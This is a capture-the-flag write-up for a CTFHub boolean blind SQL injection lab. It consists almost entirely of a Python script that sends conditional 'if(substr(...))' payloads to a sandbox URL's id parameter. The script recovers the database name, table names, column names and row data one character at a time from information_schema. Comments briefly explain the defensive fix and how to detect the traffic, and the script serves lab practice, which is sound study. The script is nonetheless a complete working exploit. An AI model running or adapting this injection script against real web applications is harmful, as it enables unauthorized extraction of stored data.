
CTFHub-布尔盲注-wp #(自制脚本做法)


CTFHub布尔盲注脚本

# -*- coding: utf-8 -*-
# @Time : 2021/5/15 21:33
# @Author : z1moq
# @File : ctfhub布尔盲注.py
# @Software: PyCharm
import requests
import string

# Boolean-based blind SQL injection walkthrough script for a CTFHub lab.
#
# How the side channel works (as far as the code shows): every request sends one
# yes/no question to the ``id`` parameter in the form
#   if(<condition>, 1, (select table_name from information_schema.tables))
# and the caller decides the answer by whether ``mark`` appears in the response
# body.  The false branch is a subquery used where a scalar is expected; it is
# presumably chosen because it returns more than one row and therefore makes the
# query fail, so the marker is missing.  NOTE(review): this is inferred from the
# payload shape, not verified here.
#
# Defender's view: the technique only works because the target concatenates the
# raw ``id`` parameter into its SQL text.  Parameterised queries (or a strict
# allow-list for ``id``) remove the primitive entirely; the traffic pattern is
# also easy to spot -- a large burst of near-identical requests whose query
# string differs in one character, referencing ``information_schema``.
#
# All functions below share the same contract: ``url`` is the base URL ending in
# the injectable parameter and ``mark`` is the success marker searched for in
# each response.  They print progress as they go and talk to the network on
# every iteration.


def get_database(url: str, mark: str) -> str:
    """Recover the current database name one character at a time.

    Only positions 1..8 are probed and only ASCII letters are tried; a position
    for which no letter matches is silently skipped (there is no ``else``), so
    the result may be shorter than the real name.  Returns the characters that
    did match.
    """
    database = ''
    for i in range(1, 9):
        for j in string.ascii_letters:
            target = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            r = requests.get(target)
            if mark in r.text:
                # A hit means the condition evaluated true: this is the i-th character.
                database += j
                print(database)
                break
    print('Database:', database)
    return database


def get_table(url: str, mark: str, database: str) -> str:
    """Recover the first two table names of *database* (5 letters each) and prompt for one.

    ``database`` is embedded verbatim inside the payload's quotes.  The function
    prints every candidate it finds but returns whatever the operator types at
    the prompt, which is not validated against ``tablesname``.
    """
    tablesname = []
    for i in range(0, 2):
        name = ''
        for j in range(1, 6):
            for k in string.ascii_letters:
                # ``%`` binds tighter than ``+``: only the last literal is formatted,
                # and it carries all three placeholders, so this is intentional.
                target = url + 'if(substr((select table_name from information_schema.tables where table_schema="' +\
                    database + '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(target)
                if mark in r.text:
                    name += k
                    print(name)
                    break
        tablesname.append(name)
    print('Tablesame:', tablesname)
    return input("Choose TableName:")


def get_columns(url: str, mark: str, tablename: str, database: str) -> str:
    """Recover the first three column names of *tablename* (5 letters each) and prompt for one.

    Same probing scheme as :func:`get_table`; ``tablename`` and ``database`` are
    spliced into the payload without any escaping.  The return value is the
    operator's typed choice, not necessarily one of ``columns``.
    """
    columns = []
    for i in range(0, 3):
        name = ''
        for j in range(1, 6):
            for k in string.ascii_letters:
                target = url + 'if(substr((select column_name from information_schema.columns where table_name="'\
                    + tablename + '" and table_schema="' + database\
                    + '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(target)
                if mark in r.text:
                    name += k
                    print(name)
                    break
        columns.append(name)
    print('Columnsname:', columns)
    return input("Choose Columnname:")


def getdata(url: str, mark: str, tablename: str, database: str, columns: str) -> None:
    """Read up to 50 characters of ``select <columns> from <tablename>`` via the side channel.

    The alphabet here is wider than in the name-recovery helpers (digits,
    letters and punctuation).  ``tablename`` and ``columns`` come straight from
    ``input()`` in the callers and are placed into the payload unchanged.
    ``database`` is accepted for a uniform signature but is not used.  Prints
    the accumulated value after each hit and once more at the end; returns
    nothing.
    """
    data = ''
    for i in range(0, 50):
        for j in string.digits\
                + string.ascii_letters\
                + string.punctuation:
            payload = url + 'if(substr((select '\
                + columns\
                + ' from ' + tablename\
                + '),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            request = requests.get(payload)
            if mark in request.text:
                data += j
                print(data)
                break
    print(data)


if __name__ == "__main__":
    # Lab instance URL and the response marker that signals the true branch.
    url = "http://challenge-1d65b510fd09970c.sandbox.ctfhub.com:10080/?id="
    mark = "query_success"
    database = get_database(url, mark)
    tablename = get_table(url, mark, database)
    columns = get_columns(url, mark, tablename, database)
    getdata(url, mark, tablename, database, columns)